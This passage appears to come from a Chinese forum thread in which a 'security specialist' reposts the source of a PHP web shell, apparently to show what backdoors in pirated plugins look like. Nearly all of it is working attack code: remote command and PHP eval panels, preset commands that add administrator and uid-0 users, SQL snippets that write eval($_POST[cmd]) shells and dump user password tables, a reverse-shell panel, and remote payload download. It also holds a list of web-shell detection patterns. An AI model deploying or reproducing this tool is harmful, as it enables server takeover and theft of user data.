form.chkall.checked; } } } }function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); } function nf(a,b) { re = prompt("新建名",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } } function dels(a) { if(a == 'b') { var msg = "所選文件"; $('act').value = a; } else { var msg = "目錄"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("確定要刪除"+msg+"嗎")) { $('frm1').submit(); } }function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }</script><title><?php
echo VERSION;
?></title></head><body><div class="main"><div class="outl"><div class="toptag"><?php
echo $_SERVER['SERVER_ADDR'] . ' - ' . PHP_OS . ' - whoami(' . get_current_user() . ') - 【uid(' . getmyuid() . ') gid(' . getmygid() . ')】';
if (isset($issql))
echo ' - 【' . $issql . '】';
?></div><?php
$menu = array(
'file' => '文件管理',
'scan' => '搜索文件',
'antivirus' => '掃描后門',
'exec' => '執行命令',
'phpeval' => '執行PHP',
'sql' => '執行SQL',
'backshell' => '反彈SHELL',
'info' => '系統信息'
);
$go = array_key_exists($_POST['go'], $menu) ? $_POST['go'] : 'file';
$nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']) . '/') : THISDIR;
echo '<div class="tag">';
foreach ($menu as $key => $name) {
echo '<a' . ($go == $key ? ' class="current"' : '') . ' href="javascript:void(0);" onclick="go(\'' . $key . '\',\'' . base64_encode($nowdir) . '\');">' . $name . '</a> ';
}
echo '</div>';
echo '<form name="gofrm" id="gofrm" method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="">';
echo '<input type="hidden" name="godir" id="godir" value="' . $nowdir . '">';
echo '<input type="hidden" name="govar" id="govar" value="">';
echo '</form>';
switch ($_POST['go']) {
case "info":
if (EXISTS_PHPINFO) {
ob_start();
phpinfo(INFO_GENERAL);
$out = ob_get_contents();
ob_end_clean();
$tmp = array();
preg_match_all('/\<td class\="e"\>([Configure Command|Loaded Configuration File])+\s*\<\/td\>\<td class\="v"\>(.*)\<\/td\>/i', $out, $tmp);
}

復制代碼

帖子長度超了，回帖接上

傳送門：安全小知識：為什么使用盜版插件容易被掛馬

安全專員 · 發表于 2019-7-15 10:08:32

$infos = array(
'程序說明' => '采用POST瀏覽是為了不記錄瀏覽日志.<br>登錄密碼保存在頁面中,所以無須COOKIE和SESSION.登錄有效期為當前頁面進程.<br>請勿將本程序作為非法用途.',
'客戶端瀏覽器信息' => $_SERVER['HTTP_USER_AGENT'],
'被禁用的函數' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(無)',
'被禁用的類' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(無)',
'PHP.ini配置路徑' => $tmp[2][1] ? $tmp[2][1] : '(無)',
'PHP運行方式' => php_sapi_name(),
'PHP版本' => PHP_VERSION,
'PHP進程PID' => getmypid(),
'客戶端IP' => $_SERVER['REMOTE_ADDR'],
'客戶端文字編碼' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],
'Web服務端口' => $_SERVER['SERVER_PORT'],
'Web根目錄' => $_SERVER['DOCUMENT_ROOT'],
'Web執行腳本' => $_SERVER['SCRIPT_FILENAME'],
'Web規范CGI版本' => $_SERVER['GATEWAY_INTERFACE'],
'Web管理員Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(無)',
'當前磁盤總大小' => size(disk_total_space('.')),
'當前磁盤可用空間' => size(disk_free_space('.')),
'POST最大字數量' => get_cfg_var("post_max_size"),
'允許最大上傳文件' => get_cfg_var("upload_max_filesize"),
'程序最大使用內存量' => get_cfg_var("memory_limit"),
'程序最長運行時間' => get_cfg_var("max_execution_time") . '秒',
'是否支持Fsockopen' => function_exists('fsockopen') ? '是' : '否',
'是否支持Socket' => function_exists('socket_close') ? '是' : '否',
'是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否',
'是否支持Curl' => function_exists('curl_version') ? '是' : '否',
'是否支持Zlib' => function_exists('gzclose') ? '是' : '否',
'是否支持FTP' => function_exists('ftp_login') ? '是' : '否',
'是否支持XML' => function_exists('xml_set_object') ? '是' : '否',
'是否支持GD_Library' => function_exists('imageline') ? '是' : '否',
'是否支持COM組建' => class_exists('COM') ? '是' : '否',
'是否支持ODBC組建' => function_exists('odbc_close') ? '是' : '否',
'是否支持IMAP郵件' => function_exists('imap_close') ? '是' : '否',
'是否運行于安全模式' => get_cfg_var("safemode") ? '是' : '否',
'是否允許URL打開文件' => get_cfg_var("allow_url_fopen") ? '是' : '否',
'是否允許動態加載鏈接庫' => get_cfg_var("enable_dl") ? '是' : '否',
'是否顯示錯誤信息' => get_cfg_var("display_errors") ? '是' : '否',
'是否自動注冊全局變量' => get_cfg_var("register_globals") ? '是' : '否',
'是否使用反斜線引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否',
'PHP編譯參數' => $tmp[2][0] ? $tmp[2][0] : '(無)'
);
echo '<div class="msgbox">' . $msg . '</div>';
echo '<table class="tables"><tr><th style="width:26%;">名稱</th><th>參數</th></tr>';
foreach ($infos as $name => $var) {
echo '<tr><td>' . $name . '</td><td>' . $var . '</td></tr>';
}
echo '</table>';
break;
case "exec":
$cmd = $win ? 'dir' : 'ls -al';
$res = array(
'res' => '命令回顯',
'msg' => $msg
);
$str = isset($_POST['str']) ? $_POST['str'] : 'fun';
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$cwd = $str == 'fun' ? THISDIR : 'com';
$res = command($cmd, $cwd);
}
echo '<div class="msgbox">' . $res['msg'] . '</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="exec">';
echo '<div class="actall">命令 <input type="text" name="cmd" id="cmd" value="' . htmlspecialchars($cmd) . '" style="width:398px;"> ';
echo '<select name="str">';
$selects = array(
'fun' => 'phpfun',
'com' => 'wscript'
);
foreach ($selects as $var => $name) {
echo '<option value="' . $var . '"' . ($var == $str ? ' selected' : '') . '>' . $name . '</option>';
}
echo '</select> ';
echo '<select onchange="$(\'cmd\').value=options[selectedIndex].value">';
echo '<option>---命令集合---</option>';
echo '<option value="echo ' . htmlspecialchars('"<?php phpinfo();?>"') . ' >> ' . THISDIR . 't00ls.txt">寫文件</option>';
echo '<option value="whoami">我是誰</option>';
echo '<option value="net user t00ls t00ls /add">Win-添加用戶</option>';
echo '<option value="net localgroup administrators t00ls /add">Win-設用戶組</option>';
echo '<option value="netstat -an">Win-查看端口</option>';
echo '<option value="ipconfig /all">Win-查看地址</option>';
echo '<option value="net start">Win-查看服務</option>';
echo '<option value="tasklist">Win-查看進程</option>';
echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-版本集合</option>';
echo '<option value="/usr/sbin/useradd -u 0 -o -g 0 t00ls">Linux-添加用戶</option>';
echo '<option value="cat /etc/passwd">Linux-查看用戶</option>';
echo '<option value="/bin/netstat -tnl">Linux-查看端口</option>';
echo '<option value="/sbin/ifconfig -a">Linux-查看地址</option>';
echo '<option value="/sbin/chkconfig --list">Linux-查看服務</option>';
echo '<option value="/bin/ps -ef">Linux-查看進程</option>';
echo '</select> ';
echo '<input type="submit" style="width:50px;" value="執行">';
echo '</div><div class="actall"><textarea style="width:698px;height:368px;">' . htmlspecialchars($res['res']) . '</textarea></div></form>';
break;
case "scan":
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';
$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';
$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';
echo '<div class="msgbox">' . $msg . '</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="scan">';
echo '<table class="tables"><tr><th style="width:15%;">名稱</th><th>設置</th></tr>';
echo '<tr><td>搜索路徑</td><td><input type="text" name="dir" value="' . htmlspecialchars($scandir) . '" style="width:500px;"></td></tr>';
echo '<tr><td>搜索內容</td><td><input type="text" name="keyword" value="' . htmlspecialchars($keyword) . '" style="width:500px;"> (文件名或文件內容)</td></tr>';
echo '<tr><td>文件后綴</td><td><input type="text" name="include" value="' . htmlspecialchars($include) . '" style="width:500px;"> (用"|"分割, 為空則搜索所有文件)</td></tr>';
echo '<tr><td>過濾目錄</td><td><input type="text" name="filters" value="' . htmlspecialchars($filters) . '" style="width:500px;"> (用"|"分割, 為空則不過濾目錄)</td></tr>';
echo '<tr><td>搜索方式</td><td><label><input type="radio" name="type" value="0"' . ($_POST['type'] ? '' : ' checked') . '>搜索文件名</label> ';
echo '<label><input type="radio" name="type" value="1"' . ($_POST['type'] ? ' checked' : '') . '>搜索包含文字</label> ';
echo '<label><input type="checkbox" name="char" value="1"' . ($_POST['char'] ? ' checked' : '') . '>匹配大小寫</label></td></tr>';
echo '<tr><td>搜索范圍</td><td><label><input type="radio" name="range" value="0"' . ($_POST['range'] ? '' : ' checked') . '>將搜索應用于該文件夾,子文件夾和文件</label> ';
echo '<label><input type="radio" name="range" value="1"' . ($_POST['range'] ? ' checked' : '') . '>僅將搜索應用于該文件夾</label></td></tr>';
echo '<tr><td>操作</td><td><input type="submit" style="width:80px;" value="搜索"></td></tr>';
echo '</table></form>';
if ($keyword != '') {
flush();
ob_flush();
echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
$incs = $include == '' ? false : explode('|', $include);
$fits = $filters == '' ? false : explode('|', $filters);
scanfile(strdir($scandir . '/'), $keyword, $incs, $fits, $_POST['type'], $_POST['char'], $_POST['range'], $nowdir);
echo '搜索完成</div>';
}
break;
case "antivirus":
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
$typearr = isset($_POST['dir']) ? $_POST['types'] : array(
'php' => '.php'
);
echo '<div class="msgbox">' . $msg . '</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="antivirus">';
echo '<table class="tables"><tr><th style="width:15%;">名稱</th><th>設置</th></tr>';
echo '<tr><td>掃描路徑</td><td><input type="text" name="dir" value="' . htmlspecialchars($scandir) . '" style="width:500px;"></td></tr>';
echo '<tr><td>查殺類型</td><td>';
$types = array(
'php' => '.php',
'asp+aspx' => '.as|.cs|.cer',
'jsp' => '.jsp'
);
foreach ($types as $key => $ex)
echo '<label title="' . $ex . '"><input type="checkbox" name="types[' . $key . ']" value="' . $ex . '"' . ($typearr[$key] == $ex ? ' checked' : '') . '>' . $key . '</label> ';
echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="掃描"></td></tr>';
echo '</table></form>';
if (count($_POST['types']) > 0) {
$matches = array(
'php' => array(
'/function\_exists\s*$\s*[\'|"](popen|exec|proc\_open|system|passthru)+[\'|"]\s*$/i',
'/(exec|shell\_exec|system|passthru)+\s*$\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*$/i',
'/(udp\:\/\/(.*)\;)+/i',
'/preg\_replace\s*$(.*)\/e(.*)\,\s*\$\_(.*)\,(.*)$/i',
'/preg\_replace\s*\((.*)\(base64\_decode\(\$/i',
'/(eval|assert|include|require)+\s*\((.*)(base64\_decode|file\_get\_contents|php\:\/\/input)+/i',
'/(eval|assert|include|require|array\_map)+\s*$\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*$/i',
'/\$\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\s*$\s*\$(\w+)\s*$/i',
'/\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]$\s*\$(.*)$/i',
'/$\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_FILES\[(.*)\]\[(.*)\]\s*$/i',
'/(fopen|fwrite|fpust|file\_put\_contents)+\s*$(.*)\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\](.*)$/i',
'/echo\s*curl\_exec\s*$\s*\$(\w+)\s*$/i',
'/new com\s*$\s*[\'|"]shell(.*)[\'|"]\s*$/i',
'/\$(.*)\s*$(.*)\/e(.*)\,\s*\$\_(.*)\,(.*)$/i',
'/\$\_\=(.*)\$\_/i'
),
'asp+aspx' => array(
'/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i',
'/(eval|execute)+(.*)(request|session)+\s*$(.*)$/i',
'/(eval|execute)+(.*)request.item\s*\[(.*)\]/i',
'/request\s*$(.*)$(.*)(eval|execute)+\s*$(.*)$/i',
'/\<script\s*runat\s*\=(.*)server(.*)\>(.*)\<\/script\>/i',
'/Load\s*\((.*)Request/i',
'/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i'
),
'jsp' => array(
'/(eval|execute)+(.*)(request|session)+\s*$(.*)$/i',
'/(eval|execute)+(.*)request.item\s*\[(.*)\]/i',
'/request\s*$(.*)$(.*)(eval|execute)+\s*$(.*)$/i',
'/Runtime\.getRuntime\.exec$(.*)$/i',
'/FileOutputStream\(application\.getRealPath(.*)request/i'
)
);
flush();
ob_flush();
echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">';
antivirus(strdir($scandir . '/'), $typearr, $matches, $nowdir);
echo '掃描完成</div>';
}
break;
case "phpeval":
if (isset($_POST['phpcode'])) {
$phpcode = chop($_POST['phpcode']);
ob_start();
if (substr($phpcode, 0, 2) == '<?' && substr($phpcode, -2) == '?>') {
@eval('?>' . $phpcode . '<?php ');
} else {
@eval($phpcode);
}
$out = ob_get_contents();
ob_end_clean();
} else {
$phpcode = 'phpinfo();';
$out = '回顯窗口';
}
echo base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+');
echo '<div class="msgbox">' . $msg . '</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="phpeval">';
echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">' . htmlspecialchars($phpcode) . '</textarea></p><p>';
echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">';
echo '<option>---插件代碼---</option>';
echo '<option value="echo readfile(\'C:/web/t00ls.php\');">讀取文件</option>';
echo '<option value="$fp=fopen(\'C:/web/t00ls.php\',\'w\');echo fputs($fp,\'<?php eval($_POST[cmd]);?>\')?\'Success!\':\'Fail!\';fclose($fp);">寫入文件</option>';
echo '<option value="echo copy(\'C:/web/t00ls1.php\',\'C:/web/t00ls2.php\')?\'Success!\':\'Fail!\';">復制文件</option>';
echo '<option value="echo file_put_contents(\'' . THISDIR . 'cmd.exe\', file_get_contents(\'http://www.baidu.com/cmd.exe\'))?\'Success!\':\'Fail!\';">遠程下載</option>';
echo '<option value="print_r($_SERVER);">環境變量</option>';
echo '</select> ';
echo '<input type="submit" style="width:80px;" value="執行"></p></div>';
echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">' . htmlspecialchars($out) . '</textarea></p><p><input type="button" value="以HTML運行以上代碼" onclick="runcode(\'evalcode\')"></p></div>';
break;
case "sql":
if ((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {
$type = $_POST['type'];
$sqlhost = $_POST['sqlhost'];
$sqluser = $_POST['sqluser'];
$sqlpass = $_POST['sqlpass'];
$sqlname = $_POST['sqlname'];
$sqlcode = $_POST['sqlcode'];
$names = $_POST['names'];
switch ($type) {
case "PostgreSql":
if (function_exists('pg_close')) {
if (strstr($sqlhost, ':')) {
$array = explode(':', $sqlhost);
$sqlhost = $array[0];
$sqlport = $array[1];
} else {
$sqlport = 5432;
}
$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");
if ($dbconn) {
$msg = '<h2>連接' . $type . '成功 </h2>';
pg_query('set client_encoding=' . $names);
$result = pg_query($sqlcode);
if ($result) {
$msg .= '<h2> - 執行SQL成功</h2>';
while ($array = pg_fetch_array($result)) {
$rows[] = $array;
}
} else {
$msg .= '<h1> - 執行SQL失敗</h1>';
$rows = array(
'error' => pg_result_error($result)
);
}
pg_free_result($result);
} else {
$msg = '<h1>連接' . $type . '失敗</h1>';
}
@pg_close($dbconn);
} else {
$msg = '<h1>不支持' . $type . '</h1>';
}
break;
case "MsSql":
if (function_exists('mssql_close')) {
$dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass);
if ($dbconn) {
$msg = '<h2>連接' . $type . '成功 </h2>';
mssql_select_db($sqlname, $dbconn);
$result = mssql_query($sqlcode);
if ($result) {
$msg .= '<h2> - 執行SQL成功</h2>';
while ($array = mssql_fetch_array($result)) {
$rows[] = $array;
}
} else {
$msg .= '<h1> - 執行SQL失敗</h1>';
}
@mssql_free_result($result);
} else {
$msg = '<h1>連接' . $type . '失敗</h1>';
}
@mssql_close($dbconn);
} else {
$msg = '<h1>不支持' . $type . '</h1>';
}
break;
case "Oracle":
if (function_exists('oci_close')) {
$conn = @oci_connect($sqluser, $sqlpass, $sqlhost . '/' . $sqlname);
if ($conn) {
$msg = '<h2>連接' . $type . '成功 </h2>';
$stid = oci_parse($conn, $sqlcode);
oci_execute($stid);
if ($stid) {
$msg .= '<h2> - 執行SQL成功</h2>';
while (($array = oci_fetch_array($stid, OCI_ASSOC))) {
$rows[] = $array;
}
} else {
$msg .= '<h1> - 執行SQL失敗</h1>';
$e = oci_error();
$rows = array(
'error' => $e['message']
);
}
oci_free_statement($stid);
} else {
$e = oci_error();
$rows = array(
'error' => $e['message']
);
$msg = '<h1>連接' . $type . '失敗</h1>';
}
@oci_close($conn);
} else {
$msg = '<h1>不支持' . $type . '</h1>';
}
break;
case "MySql":
if (function_exists('mysql_close')) {
$conn = mysql_connect(strstr($sqlhost, ':') ? $sqlhost : $sqlhost . ':3306', $sqluser, $sqlpass, $sqlname);
if ($conn) {
$msg = '<h2>連接' . $type . '成功 </h2>';
if (substr($sqlcode, 0, 7) == 't00lsa') {
$array = array();
$data = '';
$i = 0;
preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i', $sqlcode, $array);
if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {
mysql_select_db($array[1][0], $conn);
mysql_query('set names ' . $names, $conn);
$spidercode = 'select ' . $array[3][0] . ' from `' . $array[2][0] . '`;';
$result = mysql_query($spidercode, $conn);
if ($result) {
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
$data .= join(' |x| ', $row) . "\r\n";
$i++;
}
if ($data) {
$file = strdir($array[4][0]);
$msg .= filew($file, $data, 'w') ? '<h2> - 脫庫成功</h2>' : '<h1> - 導出文件失敗</h1>';
$rows = array(
'file' => $file,
size(filesize($file)) => '共獲取' . $i . '條數據'
);
} else {
$msg .= '<h1> - 沒有數據</h1>';
}
} else {
$msg .= '<h1> - 執行SQL失敗</h1>';
$rows = array(
'errno' => mysql_errno(),
'error' => mysql_error()
);
}
} else {
$msg .= '<h1> - 脫庫語句錯誤</h1>';
}
} elseif (!empty($sqlcode)) {
mysql_select_db($sqlname, $conn);
mysql_query('set names ' . $names, $conn);
$result = mysql_query($sqlcode, $conn);
if ($result) {
$msg .= '<h2> - 執行SQL成功</h2>';
while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) {
$rows[] = $array;
}
} else {
$msg .= '<h1> - 執行SQL失敗</h1>';
$rows = array(
'errno' => mysql_errno(),
'error' => mysql_error()
);
}
}
mysql_free_result($result);
} else {
$msg = '<h1>連接' . $type . '失敗</h1>';
$rows = array(
'errno' => mysql_errno(),
'error' => mysql_error()
);
}
mysql_close($conn);
} else {
$msg = '<h1>不支持' . $type . '</h1>';
}
break;
}
} else {
$type = 'MySql';
$sqlhost = 'localhost:3306';
$sqluser = 'root';
$sqlpass = '123456';
$sqlname = 'mysql';
$sqlcode = 'select version();';
$names = 'gbk';
}
echo '<div class="msgbox">' . $msg . '</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="sql">';
echo '<table class="tables"><tr><th style="width:15%;">名稱</th><th>設置</th></tr>';
echo '<tr><td>支持類型</td><td>';
$dbs = array(
'MySql',
'MsSql',
'Oracle',
'PostgreSql'
);
foreach ($dbs as $dbname) {
echo '<label><input type="radio" name="type" value="' . $dbname . '"' . ($type == $dbname ? ' checked' : '') . '>' . $dbname . '</label> ';
}
echo '</td></tr><tr><td>連接</td><td>地址 <input type="text" name="sqlhost" style="width:188px;" value="' . $sqlhost . '"> ';
echo '用戶 <input type="text" name="sqluser" style="width:108px;" value="' . $sqluser . '"> ';
echo '密碼 <input type="text" name="sqlpass" style="width:108px;" value="' . $sqlpass . '"> ';
echo '庫名 <input type="text" name="sqlname" style="width:108px;" value="' . $sqlname . '"></td></tr>';
echo '<tr><td>語句<br>';
echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';
echo '<option value="select version();">---語句集合---</option>';
echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';">寫入文件</option>';
echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \'' . $sqluser . '\'@\'%\' IDENTIFIED BY \'' . $sqlpass . '\' WITH GRANT OPTION;">開啟外連</option>';
echo '<option value="show variables;">系統變量</option>';
echo '<option value="create database t00ls;">創建數據庫</option>';
echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">創建數據表</option>';
echo '<option value="show databases;">顯示數據庫</option>';
echo '<option value="show tables from `' . $sqlname . '`;">顯示數據表</option>';
echo '<option value="show columns from `t00ls`;">顯示表結構</option>';
echo '<option value="drop table `t00ls`;">刪除數據表</option>';
echo '<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">顯示字段</option>';
echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');">插入數據</option>';
echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;">修改數據</option>';
echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \'' . THISDIR . 'out.txt\';">脫庫(MySql)</option>';
echo '</select>';
echo '</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">' . htmlspecialchars($sqlcode) . '</textarea></td></tr>';
echo '<tr><td>操作</td><td><select name="names">';
$charsets = array(
'gbk',
'utf8',
'big5',
'latin1',
'cp866',
'ujis',
'euckr',
'koi8r',
'koi8u'
);
foreach ($charsets as $charset) {
echo '<option value="' . $charset . '"' . ($names == $charset ? ' selected' : '') . '>' . $charset . '</option>';
}
echo '</select> <input type="submit" style="width:80px;" value="執行"></td></tr>';
echo '</table></form>';
if ($rows) {
echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';
ob_start();
print_r($rows);
$out = ob_get_contents();
ob_end_clean();
if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $out) && function_exists('iconv')) {
$out = @iconv('UTF-8', 'GB2312//IGNORE', $out);
}
echo htmlspecialchars($out);
echo '</pre>';
}
break;
case "backshell":
if ((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {
$backip = $_POST['backip'];
$backport = $_POST['backport'];
$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';
$type = $_POST['type'];
$msg = backshell($backip, $backport, $temp, $type);
} else {
$backip = $_SERVER['REMOTE_ADDR'];
$backport = '443';
$temp = '/tmp';
$type = 'pl';
$msg = 'PHP反彈可兼容Linux和Windows 其余方法只用于Linux';
}
echo '<div class="msgbox">' . $msg . '</div>';
echo '<form method="POST">';
subeval();
echo '<input type="hidden" name="go" id="go" value="backshell">';
echo '<table class="tables"><tr><th style="width:15%;">名稱</th><th>設置</th></tr>';
echo '<tr><td>反彈地址</td><td><input type="text" name="backip" style="width:268px;" value="' . $backip . '"> (Your ip)</td></tr>';
echo '<tr><td>反彈端口</td><td><input type="text" name="backport" style="width:268px;" value="' . $backport . '"> (nc -vvlp ' . $backport . ')</td></tr>';
echo '<tr><td>臨時目錄</td><td><input type="text" name="temp" style="width:268px;" value="' . $temp . '"> (Only Linux)</td></tr>';
echo '<tr><td>反彈方法</td><td>';
$types = array(
'pl' => 'Perl',
'py' => 'Python',
'c' => 'C-bin',
'pcntl' => 'Pcntl',
'php' => 'PHP',
'phpwin' => 'PHP-COM'
);
foreach ($types as $key => $name) {
echo '<label><input type="radio" name="type" value="' . $key . '"' . ($key == $type ? ' checked' : '') . '>' . $name . '</label> ';
}
echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="反彈"></td></tr>';
echo '</table></form>';
break;
case "edit":
case "editor":
$file = strdir($_POST['godir'] . '/' . $_POST['govar']);
$iconv = function_exists('iconv');
if (!file_exists($file)) {
$msg = '【新建文件】';
} else {
$code = filer($file);
$chst = '默認';
if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $code) && $iconv) {
$chst = 'utf-8';
$code = @iconv('UTF-8', 'GB2312//IGNORE', $code);
}
$size = size(filesize($file));
$msg = '【文件屬性 ' . substr(decoct(fileperms($file)), -4) . '】【文件大小 ' . $size . '】【文件編碼 ' . $chst . '】';
}
echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');
echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE查找內容" onclick="search($(\'keyword\').value);"> - ' . $msg . '</div>';
echo '<form name="editfrm" id="editfrm" method="POST">';
subeval();
echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';
echo '<input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';
echo '<div class="actall">文件 <input type="text" name="filename" value="' . $file . '" style="width:528px;"> ';
if ($iconv) {
echo '編碼 <select name="tostr">';
$selects = array(
'normal' => '默認',
'utf' => 'utf-8'
);
foreach ($selects as $var => $name) {
echo '<option value="' . $var . '"' . ($name == $chst ? ' selected' : '') . '>' . $name . '</option>';
}
echo '</select>';
}
echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">' . htmlspecialchars($code) . '</textarea></div></form>';
echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="保存" style="width:80px;"> ';
echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="' . dirname($file) . '">';
subeval();
echo '<input type="button" onclick="$(\'backfrm\').submit();" value="返回" style="width:80px;"></form></div>';
break;
case "upfiles":
$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];
$msg = '【最大上傳文件 ' . get_cfg_var("upload_max_filesize") . '】【POST最大提交數據 ' . get_cfg_var("post_max_size") . '】';
$max = 10;
if (isset($_FILES['uploads']) && isset($_POST['renames'])) {
$uploads = $_FILES['uploads'];
$msgs = array();
for ($i = 1; $i < $max; $i++) {
if ($uploads['error'][$i] == UPLOAD_ERR_OK) {
$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
$filea = $uploads['tmp_name'][$i];
$fileb = strdir($updir . '/' . $rename);
$msgs[$i] = fileu($filea, $fileb) ? '<br><h2>上傳成功 ' . $rename . '</h2>' : '<br><h1>上傳失敗 ' . $rename . '</h1>';
}
}
}
